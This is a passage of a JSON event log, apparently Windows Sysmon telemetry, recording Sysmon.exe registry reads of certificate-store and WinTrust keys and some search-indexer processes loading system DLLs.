"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msidle.dll", - "image_path": "C:\\Windows\\System32\\msidle.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916060016, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\System32\\propsys.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "SearchFilterHost.exe", - "image_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "tquery.dll", - "image_path": "C:\\Windows\\System32\\tquery.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916369984, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "mssprxy.dll", - "image_path": "C:\\Windows\\System32\\mssprxy.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "mssprxy.dll", - "image_path": "C:\\Windows\\System32\\mssprxy.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916530000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570916840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 